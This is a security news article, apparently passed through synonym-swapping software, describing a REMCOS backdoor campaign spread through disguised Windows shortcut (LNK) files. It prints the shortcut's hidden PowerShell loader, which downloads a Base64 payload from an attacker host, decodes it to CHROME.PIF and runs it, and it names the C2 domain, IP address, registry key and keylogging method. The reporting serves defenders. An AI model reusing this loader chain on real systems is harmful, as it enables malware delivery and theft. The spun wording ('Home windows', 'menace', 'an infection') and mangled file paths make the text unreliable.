Cybercriminals are more and more leveraging malicious Home windows Shortcut (LNK) information to deploy refined backdoors, with a brand new marketing campaign delivering a complicated REMCOS variant that efficiently evades conventional antivirus detection mechanisms.
This multi-stage assault demonstrates the evolving sophistication of menace actors who exploit legit Home windows performance to ascertain persistent footholds in focused programs.
The marketing campaign begins with social engineering ways, distributing LNK information disguised as legit paperwork reminiscent of invoices or buy orders.
These information carry innocuous names like “ORDINE-DI-ACQUIST-7263535” and seem as normal paperwork to unsuspecting customers.
Nevertheless, beneath this facade lies a fancy an infection chain that leverages PowerShell instructions, Base64 encoding, and fileless execution methods to ship the REMCOS backdoor payload.
An infection Workflow (Supply – Level Wild)
Level Wild analysts recognized this specific variant by means of complete behavioral evaluation, revealing its capability to bypass a number of layers of safety controls by means of refined obfuscation methods.
The malware’s stealth capabilities stem from its abuse of legit Home windows processes and its strategic placement of malicious elements inside trusted system directories.
The assault initiates when customers double-click the seemingly innocent LNK file, which instantly triggers a hidden PowerShell execution.
LNK File goal path (Supply – Level Wild)
Fairly than displaying macro warnings typical of malicious Workplace paperwork, LNK information execute silently, making them significantly harmful for finish customers.
The embedded PowerShell command establishes the inspiration for all the an infection chain by means of a fastidiously orchestrated sequence of file downloads and decoding operations.
Superior An infection Mechanism and Payload Deployment
The technical sophistication of this REMCOS variant turns into obvious by means of its multi-stage an infection mechanism.
The preliminary LNK file comprises an in depth PowerShell command that is still largely invisible to customers because of Home windows’ property show limitations.
Content material of LNK file (Supply – Level Wild)
The whole command executes three distinct operations in speedy succession:-
C:windowsSystem32WindowsPowerShellv1.0powershell.exe -WindowStyle hidden -Command
(new-object System.Internet.WebClient).DownloadFile(‘
$file=”C:ProgramDataHEW.GIF”;
[System.Convert]::FromBase64String((Get-Content material $file)) | Set-Content material C:ProgramDataCHROME.PIF -Encoding Byte;
begin C:ProgramDataCHROME.PIF
The primary stage downloads a Base64-encoded payload from the command and management server at shipping-hr.ro, masquerading the malicious content material as a picture file named HEW.GIF.
This obfuscation approach helps evade community monitoring options that may flag suspicious executable downloads.
The second stage performs in-memory Base64 decoding, changing the textual content content material right into a binary executable named CHROME.PIF, intentionally selecting a filename that implies legit Chrome browser performance.
The ultimate payload, CHROME.PIF, represents a complicated REMCOS backdoor compiled as a Transportable Executable utilizing Borland Delphi 4.0.
Upon execution, it establishes persistence by means of registry modifications beneath the important thing “8917161-B37E3P” and creates a complete keylogging system utilizing the SetWindowsHookExA API operate.
The malware maintains command and management communication with Romanian infrastructure at IP deal with 92.82.184.33, enabling distant entry capabilities together with file switch, command execution, and surveillance features.
This marketing campaign exemplifies the present menace panorama the place attackers efficiently mix social engineering with superior technical evasion strategies, making conventional signature-based detection more and more ineffective towards fashionable malware variants.
Combine ANY.RUN TI Lookup along with your SIEM or SOAR To Analyses Superior Threats -> Attempt 50 Free Trial Searches
